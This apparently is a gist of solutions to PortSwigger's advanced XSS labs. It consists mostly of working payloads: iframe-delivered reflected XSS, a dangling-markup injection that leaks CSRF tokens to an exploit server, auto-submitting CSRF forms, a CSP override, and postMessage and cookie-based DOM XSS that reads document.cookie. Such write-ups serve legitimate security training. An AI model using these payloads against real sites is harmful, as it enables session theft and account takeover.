Skip to content

Instantly share code, notes, and snippets.

@ChrisPritchard

ChrisPritchard/advanced-xss-labs-solutions.md

Last active September 19, 2023 01:54
Show Gist options
  • Save ChrisPritchard/68e7f829535919f7196966d24b8ddbf0 to your computer and use it in GitHub Desktop.
Save ChrisPritchard/68e7f829535919f7196966d24b8ddbf0 to your computer and use it in GitHub Desktop.
Download ZIP
Solution sketchbook for Portswigger's new XSS labs (the new-new ones).
Raw
advanced-xss-labs-solutions.md

Reflected XSS into HTML context with most tags and attributes blocked

Put this in the exploit server body and 'deliver to victim' (change the host for your lab host):

<iframe src="https://acb41fc71e32c9aa80aab06000f30012.web-security-academy.net/?search=%3Cbody+onresize%3D%22alert%28%27xss%27%29%22%3E"  width=300 id="frame" onload="this.width = 500"></iframe>

Reflected XSS protected by CSP, with dangling markup attack

Step 1: get the CSRF by using the exploit server to deliver the following to the victim (replace lab and exploit server url):

<script>
document.location.href="https://ac931fff1e0e704f80cd2c9100080039.web-security-academy.net/email?email=blag%22%3E%3Ctable%20background=%27https://ace71f031efe70a080702c43015d00b1.web-security-academy.net?"
</script>

The token will show up in the logs.

Step 2: Deliver the following to the victim (replace CSRF and lab server url):

<form method="post" name="evilform" action="https://ac931fff1e0e704f80cd2c9100080039.web-security-academy.net/email/change-email">
<input type="hidden" name="csrf" value="Hd9l1m0c3zWpghPPTcP2XXqFD2wL6M2M" />
<input type="hidden" name="email" value="evil@evil.com" />
</form>
<script>document.forms['evilform'].submit()</script>

Reflected XSS protected by very strict CSP, with dangling markup attack

Set the exploit payload to the following (with exploit / standard hosts changed) then deliver to victim:

<form name="evilform" method="post" action="https://ac891fc51f1a9a4480d885df006900f7.web-security-academy.net/email/change-email">
<input type="hidden" id="csrf" name="csrf" value="" />
<input type="hidden" name="email" value="evil@evil.com" />
</form>
<script>
var token = "name=\"csrf\" value=\"";
if(name.indexOf(token) <= 0) document.location = "https://ac891fc51f1a9a4480d885df006900f7.web-security-academy.net/email?email=test%22%3E%3Ca%20href=%22https://ac411ff51fb79a6080a585620112003f.web-security-academy.net/exploit%22%3EClick%20me!%3C/a%3E%3Cbase%20target=%27blag";
else {
var loc = name.indexOf(token) + token.length;
var csrf = name.substring(loc);
csrf = csrf.substring(0, csrf.indexOf("\""))
document.getElementById('csrf').value = csrf;
document.forms['evilform'].submit(); }
</script>

How does it work? Checks if the current frame's name contains a csrf; if not, the user is redirected to a link to change-email using a reflected XSS that creates a 'click me' link and uses a dangling attack with base->target. Upon clicking the user is sent back to the exploit page where the csrf is extracted and a form is used to change their email.

Reflected XSS protected by CSP, with CSP bypass

Just set the url to: https://aca61fea1e9ec7bd80295df8004a0073.web-security-academy.net/?search=%3Cscript%3Ealert(1)%3C/script%3E&token=;%20script-src-elem%20%27unsafe-inline%27

It uses a reflected xss vector in the search box to print a script with alert, and uses the token query string to override the CSP to allow inline script tags.

DOM XSS using web messages

Deliver this to the victim (with server url changed). Img is used because Script doesnt work with innerHTML:

<iframe src="https://acb51f721fd0b337808c671c00700072.web-security-academy.net" onload="this.contentWindow.postMessage('<img src=blag onerror=alert(document.cookie) />','*')">

DOM XSS using web messages and a JavaScript URL

Deliver this (with server url changed). Works as you can use javascript: urls in the href, which invokes JS on the current page:

<iframe src="https://ac6e1f531ec5c6f5801a86ee009d00d3.web-security-academy.net" onload="this.contentWindow.postMessage('javascript:alert(document.cookie)//http:','*')">

DOM XSS using web messages and JSON.parse

Deliver this to the victim. Note the use of " to get quotes in the nested javascript. Also with the iframe src, alert(xss) didn't work but alert(document.cookie) did, which is interesting.

<iframe src="https://ac331fd21e7b389f806fa34900380092.web-security-academy.net/" onload="this.contentWindow.postMessage('{&quot;type&quot;:&quot;load-channel&quot;,&quot;url&quot;:&quot;javascript:alert(document.cookie)&quot;}','*')" />

DOM-based cookie manipulation

Deliver the following. The product page sets the current url to the cookie, then the home page uses this value as part of inner HTML. So I create a url for the product page that includes an escape and a xss image tag to alert the cookie. Worked great :)

Notably, the iframe loads the product page to set the cookie, and once loaded changes the main page to the exploitable page, in a two step manipulation.

<iframe src="https://ac601f521e2338cb80c4a9c0002c00f8.web-security-academy.net/product?productId=1&%27%3E%3Cimg%20src=blag%20onerror=alert(document.cookie)%20/%3E" onload="document.location.href='https://ac601f521e2338cb80c4a9c0002c00f8.web-security-academy.net'" />
@aesop007
Copy link

Thanks for the write-up... Just started learning about xss not to long ago and I am confused as to why we have to use an exploit server to complete it and why it doesn't run directly through the site. Thanks in advance for your help :)

@aesop007
Copy link

Thanks for the write-up... Just started learning about xss not to long ago and I am confused as to why we have to use an exploit server to complete it and why it doesn't run directly through the site. Thanks in advance for your help :)

This Lab - Reflected XSS into HTML context with most tags and attributes blocked

@localhost-MouhannadlrX
Copy link

WTF!!!!!!!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment